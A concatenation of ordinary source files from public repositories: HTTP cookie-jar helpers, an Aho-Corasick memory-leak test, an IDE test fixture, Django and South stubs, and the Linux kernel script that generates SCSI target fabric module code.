elif morsel['expires']:
time_template = '%a, %d-%b-%Y %H:%M:%S GMT'
expires = time.mktime(
time.strptime(morsel['expires'], time_template)) - time.timezone
return create_cookie(
comment=morsel['comment'],
comment_url=bool(morsel['comment']),
discard=False,
domain=morsel['domain'],
expires=expires,
name=morsel.key,
path=morsel['path'],
port=None,
rest={'HttpOnly': morsel['httponly']},
rfc2109=False,
secure=bool(morsel['secure']),
value=morsel.value,
version=morsel['version'] or 0,
)
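# Example (sketch) using the stdlib Morsel type aliased above (the Cookie
# module on Python 2, http.cookies on Python 3):
#   from Cookie import SimpleCookie
#   sc = SimpleCookie()
#   sc['sid'] = '12345'
#   sc['sid']['max-age'] = 3600
#   cookie = morsel_to_cookie(sc['sid'])  # expires ~= time.time() + 3600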
def cookiejar_from_dict(cookie_dict, cookiejar=None, overwrite=True):
"""Returns a CookieJar from a key/value dictionary.
:param cookie_dict: Dict of key/values to insert into CookieJar.
:param cookiejar: (optional) A cookiejar to add the cookies to.
:param overwrite: (optional) If False, will not replace cookies
already in the jar with new ones.
"""
if cookiejar is None:
cookiejar = RequestsCookieJar()
if cookie_dict is not None:
names_from_jar = [cookie.name for cookie in cookiejar]
for name in cookie_dict:
if overwrite or (name not in names_from_jar):
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
return cookiejar
def merge_cookies(cookiejar, cookies):
"""Add cookies to cookiejar and returns a merged CookieJar.
:param cookiejar: CookieJar object to add the cookies to.
:param cookies: Dictionary or CookieJar object to be added.
"""
if not isinstance(cookiejar, cookielib.CookieJar):
raise ValueError('You can only merge into CookieJar')
if isinstance(cookies, dict):
cookiejar = cookiejar_from_dict(
cookies, cookiejar=cookiejar, overwrite=False)
elif isinstance(cookies, cookielib.CookieJar):
try:
cookiejar.update(cookies)
except AttributeError:
for cookie_in_jar in cookies:
cookiejar.set_cookie(cookie_in_jar)
return cookiejar
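# Typical use (sketch): seed a session jar from a plain dict, then merge
# per-request cookies on top without clobbering what is already there.
# `other_jar` below is a hypothetical cookielib.CookieJar instance:
#   jar = cookiejar_from_dict({'session': 'abc'})
#   jar = merge_cookies(jar, {'csrftoken': 'xyz'})  # dict merged, no overwrite
#   jar = merge_cookies(jar, other_jar)             # jar merged via update()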
|
hellomotor/ahocorasick
|
refs/heads/master
|
test_memleak2.py
|
3
|
from distutils.util import get_platform
import sys
sys.path.insert(0, "build/lib.%s-%s" % (get_platform(), sys.version[0:3]))
import ahocorasick
"""We just want to exercise the code and monitor its memory usage."""
def getZerostate():
tree = ahocorasick.KeywordTree()
tree.add("foobar")
tree.make()
return tree.zerostate()
while True:
getZerostate()
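# A bounded variant (sketch, not part of the original test) that reports peak
# RSS via the stdlib resource module (Unix-only) instead of spinning forever:
#   import resource
#   for n in xrange(1000000):
#       getZerostate()
#       if n % 100000 == 0:
#           print resource.getrusage(resource.RUSAGE_SELF).ru_maxrss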
|
allotria/intellij-community
|
refs/heads/master
|
python/testData/intentions/PyConvertMethodToPropertyIntentionTest/simple_after.py
|
167
|
class MyClass(object):
"""
My class to show intention.
"""
def __init__(self):
self._x = None
@property
def x(self):
return self._x
x = MyClass().x
|
Idematica/django-oscar
|
refs/heads/master
|
oscar/apps/partner/views.py
|
6027
|
# Create your views here.
|
scrollback/kuma
|
refs/heads/master
|
vendor/lib/python/south/introspection_plugins/__init__.py
|
129
|
# This module contains built-in introspector plugins for various common
# Django apps.
# These imports trigger the lower-down files
import south.introspection_plugins.geodjango
import south.introspection_plugins.django_audit_log
import south.introspection_plugins.django_tagging
import south.introspection_plugins.django_taggit
import south.introspection_plugins.django_objectpermissions
import south.introspection_plugins.annoying_autoonetoone
|
chenzhiwo/linux-sunxi
|
refs/heads/lemaker-3.4
|
Documentation/target/tcm_mod_builder.py
|
4981
|
#!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: nab@kernel.org
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
    if os.path.isdir(fabric_mod_dir_var):
return 1
print "Creating fabric_mod_dir: " + fabric_mod_dir_var
ret = os.mkdir(fabric_mod_dir_var)
if ret:
tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
    p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
buf += " u64 nport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* SCSI protocol the lport is providing */\n"
buf += " u8 lport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
    p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
buf += " u64 iport_wwpn;\n"
buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
    p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* ASCII formatted InitiatorName */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
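# For orientation (sketch): with fabric_mod_name "tcm_foo" and proto_ident
# "FC", the builders above write a tcm_foo_base.h that starts roughly:
#   #define TCM_FOO_VERSION "v0.1"
#   #define TCM_FOO_NAMELEN 32
#   struct tcm_foo_nacl { u64 nport_wwpn; char nport_name[TCM_FOO_NAMELEN]; ... };
# and set fabric_mod_port = "lport" / fabric_mod_init_port = "nport" for the
# templates generated below.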
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
    p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/target_core_configfs.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"
buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n"
buf += " u32 nexus_depth;\n\n"
buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n"
buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
buf += " if (!se_nacl_new)\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
buf += " nexus_depth = 1;\n"
buf += " /*\n"
buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
buf += " * when converting a NodeACL from demo mode -> explict\n"
buf += " */\n"
buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
buf += " name, nexus_depth);\n"
buf += " if (IS_ERR(se_nacl)) {\n"
buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
buf += " return se_nacl;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
buf += " */\n"
buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return se_nacl;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (strict_strtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!tpg) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
buf += " &tpg->se_tpg, (void *)tpg,\n"
buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!" + fabric_mod_port + ") {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .get_fabric_sense_len = " + fabric_mod_name + "_get_fabric_sense_len,\n"
buf += " .set_fabric_sense_len = " + fabric_mod_name + "_set_fabric_sense_len,\n"
buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += " .fabric_post_link = NULL,\n"
buf += " .fabric_pre_unlink = NULL,\n"
buf += " .fabric_make_np = NULL,\n"
buf += " .fabric_drop_np = NULL,\n"
buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
buf += "};\n\n"
buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
buf += "{\n"
buf += " struct target_fabric_configfs *fabric;\n"
buf += " int ret;\n\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += " /*\n"
buf += " * Register the top level struct config_item_type with TCM core\n"
buf += " */\n"
buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
buf += " if (IS_ERR(fabric)) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
buf += " return PTR_ERR(fabric);\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
buf += " */\n"
buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
buf += " /*\n"
buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
buf += " */\n"
buf += " TF_CIT_TMPL(fabric)->tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_param_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
buf += " /*\n"
buf += " * Register the fabric for use within TCM\n"
buf += " */\n"
buf += " ret = target_fabric_configfs_register(fabric);\n"
buf += " if (ret < 0) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
buf += " return ret;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup our local pointer to *fabric\n"
buf += " */\n"
buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_deregister_configfs(void)\n"
buf += "{\n"
buf += " if (!" + fabric_mod_name + "_fabric_configfs)\n"
buf += " return;\n\n"
buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " int ret;\n\n"
buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
buf += " if (ret < 0)\n"
buf += " return ret;\n\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " " + fabric_mod_name + "_deregister_configfs();\n"
buf += "};\n\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
    process_fo = 0
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
            process_fo = 1
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
continue
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
p.close()
return
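# After scanning, fabric_ops holds the raw declaration line of every function
# pointer found in target_core_fabric.h, i.e. strings shaped roughly like
# "	int (*shutdown_session)(struct se_session *);" (exact contents depend on
# the kernel tree). tcm_mod_dump_fabric_ops() below pattern-matches these
# strings to decide which stub functions and prototypes to emit.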
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi.h>\n"
buf += "#include <scsi/scsi_host.h>\n"
buf += "#include <scsi/scsi_device.h>\n"
buf += "#include <scsi/scsi_cmnd.h>\n"
buf += "#include <scsi/libfc.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_configfs.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name[4:] + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_fabric_proto_ident', fo):
buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
